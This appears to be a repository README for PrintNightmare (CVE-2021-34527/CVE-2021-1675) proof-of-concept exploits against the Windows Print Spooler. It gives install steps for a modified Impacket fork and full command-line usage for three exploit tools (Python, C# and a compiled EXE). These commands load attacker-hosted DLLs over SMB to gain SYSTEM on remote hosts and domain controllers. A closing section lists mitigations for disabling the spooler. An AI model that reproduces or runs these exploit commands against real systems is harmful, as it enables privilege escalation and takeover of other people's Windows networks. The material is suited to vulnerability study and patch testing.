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PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (CVE-2021-34527, CVE-2021-1675)

Summary

This is a remote code execution vulnerability that can be used to obtain SYSTEM level privileges by an authenticated remote user against Windows machines running the print spooler service. An attacker could then use that access to create new accounts, attempt to install programs; view, change, or delete data; or create new accounts with full user rights.

This vulnerability exists due to an authorisation bypass bug in the Print Spooler service spoolsv.exe on Windows systems, which allows authenticated remote users to install print drivers using the RPC call RpcAddPrinterDriver and specify a driver file located on a remote location. A malicious user exploiting this could obtain SYSTEM level privileges on a Windows system running this service by injecting malicious DLLs as part of installing a print driver.

While Microsoft has released an update for CVE-2021-1675, this update does not protect Active Directory domain controllers or Windows systems that have Point and Print configured with the NoWarningNoElevationOnInstall option configured.

There are three PoC exploit implementations in this repo:

Technical Details

Affected Systems

Proof of Concept Exploits

As the RPC service allows the client machine to provide a location for the print drivers to be downloaded by the remote server, the following example options can be used to host the payload and the path provided when running the exploit:

Samba Share Setup

The below are slightly updated instructions from the ones provided by cube0x0:

CVE-2021-34527 python script

This is the Impacket implementation of the Printnightmare exploit by cube0x0. Before running the exploit you need to install a modified version of Impacket:

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Exploit Usage:

Exploit code for this vulnerability needs to be run using Python 3

usage: CVE-2021-34527.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share

CVE-2021-1675/34527 implementation.

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
  share                 Path to DLL. Example '\\10.10.10.10\share\evil.dll'

optional arguments:
  -h, --help            show this help message and exit

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

connection:
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
                        and you cannot resolve it
  -port [destination port]
                        Destination port to connect to SMB Server

Example;
./CVE-2021-34527.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-34527.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'

SharpPrintNightmare

The SharpPrintNightmare/ directory contains the C# Implementation of the Printnightmare exploit, for both Local Privilege Escalation (LPE) (CVE-2021-1675), as well as Remote Code Execution (RCE). The RCE functionality requires execution with local admin privileges on the machine running the exploit.

Exploit Usage:

#LPE
C:\SharpPrintNightmare.exe C:\addCube.dll

#RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'

#RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' domain.local domain_username password

EXP/ Usage instructions from afwu

Exploit Usage:

.\PrintNightmare.exe dc_ip path_to_exp user_name password

Example:
.\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123##

Mitigation/Workarounds

Determine if the Print Spooler service is running

Run the following:

Get-Service -Name Spooler

If the Print Spooler is running or if the service is not set to disabled, select one of the following options to either disable the Print Spooler service, or to Disable inbound remote printing through Group Policy:

Option 1 - Disable the Print Spooler service

If disabling the Print Spooler service is appropriate for your enterprise, use the following PowerShell commands (recommendation from Microsoft):

Stop-Service -Name Spooler -Force

Set-Service -Name Spooler -StartupType Disabled

or Disable Spooler service using registry

Stop-Service Spooler
REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start" /t REG_DWORD /d "4" /f

or Uninstall Print-Services

Uninstall-WindowsFeature Print-Services

This will disable the ability to print both locally and remotely.

Option 2 - Disable inbound remote printing through Group Policy

You can also configure the settings via Group Policy as follows:

Computer Configuration / Administrative Templates / Printers

Disable the “Allow Print Spooler to accept client connections:” policy to block remote attacks.

This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.

For more information see: Use Group Policy settings to control printers.

Acknowledgements